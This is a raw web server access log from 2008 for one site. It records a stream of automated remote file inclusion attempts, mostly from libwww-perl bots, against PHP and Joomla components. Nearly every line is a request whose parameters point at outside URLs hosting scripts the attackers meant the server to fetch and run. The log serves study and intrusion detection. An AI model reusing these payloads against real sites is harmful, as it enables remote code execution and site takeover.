121.180.11.132 - - [31/Aug/2008:09:45:06 -0700] "GET /logs//index.php?abg_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:09:45:07 -0700] "GET //index.php?abg_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 89511 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:09:45:07 -0700] "GET /logs/access_080804.log//index.php?abg_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:45:13 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:45:13 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:45:13 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:45:18 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:45:18 -0700] "GET /logs/access_080523.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:45:26 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:45:26 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:45:26 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [31/Aug/2008:09:45:40 -0700] "GET /logs/access_080518.log/plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [31/Aug/2008:09:45:41 -0700] "GET /plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [31/Aug/2008:09:45:41 -0700] "GET /logs/plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:46:15 -0700] "GET /logs/access_080722.log//plugins/payment/secpay/xsecpay.inc.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:46:15 -0700] "GET //plugins/payment/secpay/xsecpay.inc.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:46:15 -0700] "GET /logs//plugins/payment/secpay/xsecpay.inc.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:46:22 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.169.0.50 - - [31/Aug/2008:09:46:22 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
62.169.0.50 - - [31/Aug/2008:09:46:22 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:46:22 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:46:23 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [31/Aug/2008:09:46:25 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.15.10.22 - - [31/Aug/2008:09:46:28 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:46:32 -0700] "GET /index.php?meio.php=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 200 89536 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:46:42 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:46:47 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:46:47 -0700] "GET //oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:46:48 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:46:48 -0700] "GET /logs/access_080820.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:46:50 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 200 89927 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:46:51 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:46:51 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:46:55 -0700] "GET /logs/access_080510.log/index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:46:56 -0700] "GET /index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 200 89512 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:46:57 -0700] "GET /logs/index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:46:58 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:46:58 -0700] "GET //oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:46:58 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:47:00 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:47:13 -0700] "GET /logs/access_080510.log/index.php?meio.php=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:47:13 -0700] "GET /logs/index.php?meio.php=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:47:14 -0700] "GET /index.php?meio.php=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 200 89466 "-" "libwww-perl/5.805" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:19 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:19 -0700] "GET //oneadmin/config.php?path[docroot]=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:19 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:22 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [31/Aug/2008:09:47:23 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.178.228.12 - - [31/Aug/2008:09:47:23 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:23 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:24 -0700] "GET //oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:24 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:09:47:26 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:47:28 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:47:28 -0700] "GET //oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:47:29 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:47:30 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:47:31 -0700] "GET /logs/access_080820.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:47:35 -0700] "GET /logs/access_080121.log//cyberfolio/portfolio/msg/view.php?av=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:47:37 -0700] "GET /logs/access_080525.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:47:43 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:47:45 -0700] "GET /?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89576 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:47:46 -0700] "GET /logs/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:47:58 -0700] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:48:08 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:48:08 -0700] "GET /logs/access_080804.log//index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:48:08 -0700] "GET /logs//index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:48:09 -0700] "GET //index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 89522 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:48:16 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:48:16 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:48:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 89926 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:48:19 -0700] "GET /logs/access_080706.log/index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:09:48:20 -0700] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:09:48:20 -0700] "GET /protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:09:48:21 -0700] "GET /logs/protection.php?action=logout&siteurl=http://abitur91.com/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:48:40 -0700] "GET /logs/index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:09:48:40 -0700] "GET /index.php?meio.php=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 200 89512 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:48:41 -0700] "GET /logs/access_080528.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:48:43 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:48:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:48:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 89926 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:48:45 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:48:45 -0700] "GET //oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:48:46 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:48:48 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:01 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:01 -0700] "GET /logs/access_080523.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:49:03 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:09:49:16 -0700] "GET /logs/access_080303.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:49:22 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:49:23 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:49:24 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 89846 "-" "libwww-perl/5.812" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:49:25 -0700] "GET /logs/access_080528.log/errors.php?error=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:49:26 -0700] "GET /logs/access_080411.log/default.php?page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:49:26 -0700] "GET /default.php?page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:49:26 -0700] "GET /logs/default.php?page=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:49:36 -0700] "GET //components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:49:36 -0700] "GET /logs/access_080727.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:49:36 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:49:37 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:49:48 -0700] "GET /logs/access_080820.log/index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:49:48 -0700] "GET /index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:49:48 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:49:55 -0700] "GET /logs/access_080820.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:55 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:55 -0700] "GET /logs/access_080727.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:55 -0700] "GET //components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:49:56 -0700] "GET /logs/access_080820.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:49:57 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:09:49:59 -0700] "GET /logs/access_080201.log/mcf.php?content=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:09:50:02 -0700] "GET /logs/access_080810.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:09:50:04 -0700] "GET //components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:09:50:04 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:09:50:04 -0700] "GET /logs/access_080727.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:09:50:04 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
